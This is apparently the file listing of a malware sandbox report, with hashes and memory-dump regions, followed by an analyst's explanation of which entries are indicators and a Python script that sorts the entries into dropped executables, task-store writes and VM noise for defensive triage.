| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3068-51-0x000001FF454D0000-0x000001FF454F2000-memory.dmp
memory/3068-53-0x000001FF45880000-0x000001FF458AA000-memory.dmp
memory/3068-55-0x00007FFFF5DE0000-0x00007FFFF5E9E000-memory.dmp
memory/3068-54-0x00007FFFF6CB0000-0x00007FFFF6EA5000-memory.dmp
memory/3012-61-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3012-59-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3012-58-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3012-57-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3012-56-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3012-65-0x00007FFFF5DE0000-0x00007FFFF5E9E000-memory.dmp
memory/3012-64-0x00007FFFF6CB0000-0x00007FFFF6EA5000-memory.dmp
memory/3068-66-0x000001FF45500000-0x000001FF4564E000-memory.dmp
memory/632-71-0x00000179AA250000-0x00000179AA27B000-memory.dmp
memory/688-90-0x00007FFFB6D30000-0x00007FFFB6D40000-memory.dmp
memory/688-83-0x0000022D3C4F0000-0x0000022D3C51B000-memory.dmp
memory/380-105-0x0000022757B10000-0x0000022757B3B000-memory.dmp
memory/396-116-0x000002784A170000-0x000002784A19B000-memory.dmp
memory/380-112-0x00007FFFB6D30000-0x00007FFFB6D40000-memory.dmp
memory/380-111-0x0000022757B10000-0x0000022757B3B000-memory.dmp
memory/976-101-0x00007FFFB6D30000-0x00007FFFB6D40000-memory.dmp
memory/976-100-0x00000204B25A0000-0x00000204B25CB000-memory.dmp
memory/976-94-0x00000204B25A0000-0x00000204B25CB000-memory.dmp
memory/632-79-0x00007FFFB6D30000-0x00007FFFB6D40000-memory.dmp
memory/632-78-0x00000179AA250000-0x00000179AA27B000-memory.dmp
memory/632-72-0x00000179AA250000-0x00000179AA27B000-memory.dmp
memory/632-70-0x00000179AA1F0000-0x00000179AA215000-memory.dmp
memory/688-89-0x0000022D3C4F0000-0x0000022D3C51B000-memory.dmp
memory/3012-67-0x0000000140000000-0x0000000140008000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 7d612892b20e70250dbd00d0cdd4f09b |
| SHA1 | 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5 |
| SHA256 | 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02 |
| SHA512 | f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 0b990e24f1e839462c0ac35fef1d119e |
| SHA1 | 9e17905f8f68f9ce0a2024d57b537aa8b39c6708 |
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
| SHA512 | c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | 8abf2d6067c6f3191a015f84aa9b6efe |
| SHA1 | 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7 |
| SHA256 | ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea |
| SHA512 | c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | f313c5b4f95605026428425586317353 |
| SHA1 | 06be66fa06e1cffc54459c38d3d258f46669d01a |
| SHA256 | 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b |
| SHA512 | b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890 |
memory/5108-954-0x000000001CD30000-0x000000001CDA6000-memory.dmp
memory/5040-958-0x00007FFFD63F3000-0x00007FFFD63F5000-memory.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC7DF.tmp.csv
| MD5 | 7cfa6859d175bfbd0f39171939ee483d |
| SHA1 | cddceea7249a8a3d6cd749f7bb2217742dae5482 |
| SHA256 | 955cc2a84d1e9bc0ccc6e09dda465ac6521aede4b970c1bb364976db828f5a6f |
| SHA512 | 9c2f159390027c2a7673c92c568973e5d67b6bcf4d0cba448d18d97dc200b2cb8837c16caa06ed78efcd067aa860dcad7a2ac0066be7089d20e3a3e52f66fd3d |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC83E.tmp.txt
| MD5 | 26e96215aa9b5a2a005871fdbfdb1324 |
| SHA1 | bf3701aad15d8950514b1caaa06639c53d87930f |
| SHA256 | c1cd63d6ebfb5f58eb21157db8980433fe673bd090d791e530b6fead6ffb99e9 |
| SHA512 | b9d063ece3b0d210609f57d1f1e7be86faf09c15c332862891796b083d6328a8876d4c5bfd87c7d22aa6794997ae172755110d1adbabc55d135dedd53376a471 |
memory/5792-1061-0x0000000000B90000-0x0000000000BC8000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
| MD5 | d9531ccb17e4d36b0055157a51bc3762 |
| SHA1 | b88b8a76e55398d418e6ce55bc924e36812400f3 |
| SHA256 | d7cdf4a3b94730e1e3149381e6e59f469e2140526e5dc73ee1635160f4b3c7df |
| SHA512 | 5d06bd8dd82ad6bff41412d9f458344eecb9cadcb76743c530705bc4968dd6a760a1eec427b6d4d1346bab591f11610db5757f49721df73a9195c29416314248 |
memory/5108-1102-0x000000001C570000-0x000000001C580000-memory.dmp
memory/5108-1104-0x000000001C620000-0x000000001C63E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\yar.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
memory/2088-1144-0x0000000000550000-0x0000000000560000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\db\data.safe.bin
| MD5 | dd5e716bab91e0829dfbf775c232946c |
| SHA1 | acd4ae489f709e11392b62c8153333fde88a2873 |
| SHA256 | 4dc1f486cfb4930e8c151b2ec1948c3da37170ffcb152599aae93a17428b1aca |
| SHA512 | e0338d7a32d2a72fb42ac2eccc58d014177a0bcf939f45b9780064834f761ef91806c0ae7298ad849d140178f8c7bf5e30ffbac819e6b9a0b2bbcabaca63aa5b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\379b990b-3dbf-4355-9398-f611ca4d9dbb
| MD5 | 0af6eeb6f9b0abd819589b34a56d6133 |
| SHA1 | eef79e6f8f2592f5c01a849c34e7a41020fd3367 |
| SHA256 | 78a4b04176c04eeb34222c748cfa3d406ce5289a1eaa611f6db8cf86a1c0c2fe |
| SHA512 | acd2ba44df314d3a50a21715bf7a835217d15ca1fd3ea91df4458f85e50f3d9b2f2f8ca9772cddb88b44ce90eed11480b8621af83770235b2b16fa53aacbd4bf |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 89be356d888c71449da9a984cdec5aed |
| SHA1 | c4087fa6f50782eb9d4b4698a17f6d05479dcea1 |
| SHA256 | 0ccadc220da9907a5e52edb02a0fb729f979cccdec90122e9c431b33ebd45a86 |
| SHA512 | f07f8b3425a45742991dfb317f394340a08dc96dc4a7b5c5c757715fb35a5f96d90cb31a5d4588d0b5d3a8dff0168dd0d5927a2d80f4bcc8f4df747c28f50a29 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | a21e188ec9656e81174724cc5e4bdbce |
| SHA1 | c2775f0efe28c9ed08bc8a0a3030c07e98bd66a6 |
| SHA256 | a59f2ce2b7edc449711079f047c9b06917af89bf9b4a6c678c78111b417cba6d |
| SHA512 | 3db1fefae4edf14f23dfc2b18b231b80cdc6fe1e8e88766de75931a0ed005d40dee0d6eb6b8f230d3394b88ca52fda19c89bc9c2f495d7a57fcd43941777bd9a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | dd3b215776fe405e061249397d5ea22a |
| SHA1 | ad683ea30bca6d98d9a686d65c866eeb723144f8 |
| SHA256 | 1466cf8fb7e00388773e99781452c2f38cfe55b37150f1085a549977ff5eda0d |
| SHA512 | 7b451ee5b97326544c12a24bb887a2d1b802fbffacf1e0e6e800cb619b761da3ed46d64d64394f9f9e85717ce9f9ae59001f9b2f53ab4fa3a8b815890210be2b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 3230e22ce6a7f801a675fc2192ce7f4f |
| SHA1 | 2c38ddd2422bcfc2f8a7a015370f9a6066f40409 |
| SHA256 | dfcbf00413990164ce771a84af88d84e43ccd1a31ad181bb98a571e95b9177b4 |
| SHA512 | 041c5dc70669b888c336c35134983cba228a743845f686b94d33a4f4ddeee4786717904baec98d7e77c720ec2e818e26a86c31f1bc6dfc46341750eb91f55ad8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1e041e35fc39005959c1b0734fc4f9b6 |
| SHA1 | de075c6d0fb71bd4a3e080d1a09066923b3c8e84 |
| SHA256 | 90cd0cc829535dae58bf5150c0c09aff9de3957d8486162719c2fda5214e5e1d |
| SHA512 | 258b23e5950203129024c4080af930871794607b9e3a463f2c38887219048661126284e17273e41816463d419c8839f62baea5b47df2f8534f96741d1abed892 |
memory/5996-1320-0x0000000000CE0000-0x0000000000CF0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | 0d70806336f0d94a3faee385465014b5 |
| SHA1 | 583d1c75d36498a288fe12e72358d6c5dca51637 |
| SHA256 | 7c93b9374dedffbed3bfe8140ada26635ee3b215fc17371b5a0c7078f51c9de8 |
| SHA512 | 4f30d0160e74d296dcfeeb1bee606e9d062a1edf67285ba94efdfed6f7ebc2ea3c98f686a569fe71f26e0bd2dbdb4a6f1eefa6bef94d2bd375c7d17a392d4a97 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 85430baed3398695717b0263807cf97c |
| SHA1 | fffbee923cea216f50fce5d54219a188a5100f41 |
| SHA256 | a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e |
| SHA512 | 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
| MD5 | fe3355639648c417e8307c6d051e3e37 |
| SHA1 | f54602d4b4778da21bc97c7238fc66aa68c8ee34 |
| SHA256 | 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e |
| SHA512 | 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
| MD5 | 3d33cdc0b3d281e67dd52e14435dd04f |
| SHA1 | 4db88689282fd4f9e9e6ab95fcbb23df6e6485db |
| SHA256 | f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b |
| SHA512 | a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | a01c5ecd6108350ae23d2cddf0e77c17 |
| SHA1 | c6ac28a2cd979f1f9a75d56271821d5ff665e2b6 |
| SHA256 | 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42 |
| SHA512 | b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
| MD5 | 49ddb419d96dceb9069018535fb2e2fc |
| SHA1 | 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6 |
| SHA256 | 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539 |
| SHA512 | 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
| MD5 | 8be33af717bb1b67fbd61c3f4b807e9e |
| SHA1 | 7cf17656d174d951957ff36810e874a134dd49e0 |
| SHA256 | e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd |
| SHA512 | 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
| MD5 | 33bf7b0439480effb9fb212efce87b13 |
| SHA1 | cee50f2745edc6dc291887b6075ca64d716f495a |
| SHA256 | 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e |
| SHA512 | d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
| MD5 | 937326fead5fd401f6cca9118bd9ade9 |
| SHA1 | 4526a57d4ae14ed29b37632c72aef3c408189d91 |
| SHA256 | 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81 |
| SHA512 | b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
| MD5 | 688bed3676d2104e7f17ae1cd2c59404 |
| SHA1 | 952b2cdf783ac72fcb98338723e9afd38d47ad8e |
| SHA256 | 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237 |
| SHA512 | 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\F4EFE37A30D0F14C6AC03FF7949A51CBC2EBC649
| MD5 | 0e4e4e077a1d8450ef908d9c8512d8eb |
| SHA1 | 8dfd99d32aed25d8f4c7783bce4272e25311d530 |
| SHA256 | cf3507de92e808feb4ded40e792f23ea9a003e911c19c877a61d19fcfea35f35 |
| SHA512 | aad87629dfcacc06eb8d7ecf3eb89bba2591fdf653fa7f2617ecfa7d5d75a05b736b05a2db6c52fec418b23a6f09b719443751f47d3c38e0a74c65ca58cf04ab |
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | 6870bd74420e8b401365822281f80594 |
| SHA1 | 47d99a4cac4e479c0ae79e8b17f4f1d6cbef67ab |
| SHA256 | c305a29163e05fe4a5f919dedad94ab9408b8bc2815b6a9859ced4db7f1871a6 |
| SHA512 | 247179bc0e227b913a070bb4b73414ef799d89dc9b377611ff9cb649daf6cdf5874341f6993345ac94fea08063aae160f9a3eafc645a9a612e03c96e1e4a295c |
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
| MD5 | 9b2e662ce25536075ab312ebed5902f4 |
| SHA1 | c8dfe5275b990aeda762b651085727d4e39aaefd |
| SHA256 | 6b3c58d3bb9db815a3652373a821b14326c49e2322b0924998b9c6ee3cf011d3 |
| SHA512 | 3be341a88c9ff1719fc1865e5ecf3f95e7a279c84be3e1d1c552220f6bd84cf1d0529ebf9f1b15b2f851f0c87d2f8770c683018ee51f2ae3ed445b5d92c843c9 |
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
| MD5 | 5d4df79d3cca04f799aac29362187583 |
| SHA1 | 6312922a1bb17770b0036541b4d78e38ec972f29 |
| SHA256 | 647c94d5b8ce3fb55bbca4149b6f4a6858178146ce3cbadae7d6799988597d1b |
| SHA512 | 3db4260cc39ff89368eb4814bfac62efa09b93858d938543a8a561f0b5750753748632f22829226bc5c96ebb711541458e72c2b1099de6ed8610f522adc595f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 1b70f9c88d6eb3dc6688661966bbfbe4 |
| SHA1 | 1b6e5c2f100fce957df6d32272e292bdc472dcc0 |
| SHA256 | b0c6833ac9cf7f40cef2736b434e2627fe7f0b0b29bc6a3b9c8bb20514e19411 |
| SHA512 | 39e032c60accec5c72a72ecd3e877ea1bf5f96450a57b54fc5fb1978c321f31382ce836bb1106bfef2232655ab8e8b90206f466538a87a457e86eeb0f60a2321 |
memory/372-3369-0x0000000000BC0000-0x0000000000BF8000-memory.dmp
memory/4156-3380-0x00000000009D0000-0x0000000000A06000-memory.dmp
memory/572-3393-0x00000000008E0000-0x00000000008F0000-memory.dmp
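Reading the Files section: the dropped executables sit directly in the profile root (C:\Users\Admin\yar.exe, sachost.exe, penisware.exe, penisballs.exe, physics.exe, calc.exe, install.exe), with DataLogs.conf under AppData\Roaming\MyData alongside them. The Firefox profile, Edge, WER, CryptnetUrlCache and CLR UsageLogs entries are the VM's own housekeeping, and __PSScriptPolicyTest_*.ps1 under Windows\Temp is written by PowerShell itself at start-up to probe script enforcement, so it is evidence that PowerShell ran rather than an indicator. The three UpdateOrchestrator entries under System32\Tasks are legitimate Windows task names, so their file hashes are not useful IOCs on their own; the task body (action and trigger) is what needs comparing to a clean baseline. The memory/ lines are dumped regions (pid, index, start, end), not files. The script below is an added example, not the sandbox's logic: it parses entries in the layout above (SAMPLE is constructed from a few of the report's own entries) and sorts them into dropped executables with their SHA256, task-store writes, items to review, and noise; the path classes are this example's assumptions.

```python
"""Turn a sandbox report's Files section into a triage list: dropped
executables and task-store writes on one side, browser/Windows housekeeping
on the other, with hash IOCs for the former. Added example, not the
sandbox's own logic; SAMPLE is constructed from a few of the report's
entries and the path classes are this example's assumptions."""
import re
from pathlib import PureWindowsPath

# Constructed sample in the report's layout: a path line, then hash rows;
# memory/<pid>-<index>-<start>-<end>-memory.dmp lines are dumped regions.
SAMPLE = r"""
C:\Users\Admin\yar.exe
| MD5 | 9e8baf127b832943d4fae218ce90191a |
| SHA256 | fbbb58d64ed3d52ebf0c4442588f4a19e48fd64023188fb750926b13c40df8a0 |
memory/5040-5-0x00007FFFD63F3000-0x00007FFFD63F5000-memory.dmp
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
| SHA256 | c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
C:\Windows\Temp\__PSScriptPolicyTest_f3o103k1.q4v.ps1
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| SHA256 | 1466cf8fb7e00388773e99781452c2f38cfe55b37150f1085a549977ff5eda0d |
""".strip()

HASH_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
MEM_RE = re.compile(r"^memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
PATH_RE = re.compile(r"^[A-Za-z]:\\")

# Assumption: artefacts the analysis VM's browser, WER, CryptoAPI and CLR write
# regardless of the sample. __PSScriptPolicyTest_*.ps1 is written by PowerShell
# at start-up to probe script enforcement: evidence PowerShell ran, not an IOC.
NOISE_MARKERS = (r"\mozilla\firefox\profiles", r"\microsoft\edge\user data",
                 r"\microsoft\windows\wer\temp", r"\cryptneturlcache\metadata",
                 r"\clr_v4.0\usagelogs", r"\__psscriptpolicytest_")


def parse_files(text):
    """Group hash rows under the path line that precedes them; memory dump
    lines become their own entries and close the current file entry."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if (m := HASH_RE.match(line)) and current is not None:
            current["hashes"][m.group(1)] = m.group(2).lower()
        elif (m := MEM_RE.match(line)):
            start, end = int(m.group(2), 16), int(m.group(3), 16)
            entries.append({"kind": "memory", "pid": int(m.group(1)),
                            "start": start, "size": end - start})
            current = None
        elif PATH_RE.match(line):
            current = {"kind": "file", "path": line, "hashes": {}}
            entries.append(current)
    return entries


def classify_path(path):
    p = path.lower()
    if any(marker in p for marker in NOISE_MARKERS):
        return "noise"
    if "\\system32\\tasks\\" in p:
        # Task XML written under the task store. The UpdateOrchestrator names
        # in this report are legitimate Windows tasks, so compare the task body
        # (action, trigger) to a clean baseline instead of alerting on the name.
        return "task_store"
    parts = PureWindowsPath(p).parts          # ('c:\\', 'users', 'admin', 'x.exe')
    if len(parts) == 4 and parts[1] == "users" and p.endswith(".exe"):
        return "dropped_pe_profile_root"      # C:\Users\<user>\<name>.exe
    return "review"


def triage(text):
    report = {"dropped_pe": {}, "task_store": [], "review": [],
              "noise": 0, "memory_regions": []}
    for e in parse_files(text):
        if e["kind"] == "memory":
            report["memory_regions"].append((e["pid"], e["size"]))
            continue
        cls = classify_path(e["path"])
        if cls == "dropped_pe_profile_root":
            report["dropped_pe"][e["path"]] = e["hashes"].get("SHA256")
        elif cls == "task_store":
            report["task_store"].append(e["path"])
        elif cls == "review":
            report["review"].append(e["path"])
        else:
            report["noise"] += 1
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, value)
```

The "review" bucket is deliberately a catch-all: DataLogs.conf lands there because nothing in the path says what it is, and that is the right outcome for a file the report gives only a hash for.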